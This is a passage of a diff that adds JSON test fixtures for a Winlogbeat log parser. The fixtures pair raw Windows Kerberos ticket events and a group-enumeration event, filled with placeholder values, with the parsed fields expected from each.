uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": 
"security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + 
"account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..7b1f0f39d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json 
@@ -0,0 +1,101 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du 
client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires 
:\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": 
"Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..b69049f3d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json 
@@ -0,0 +1,114 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon 
ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", 
+ "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + 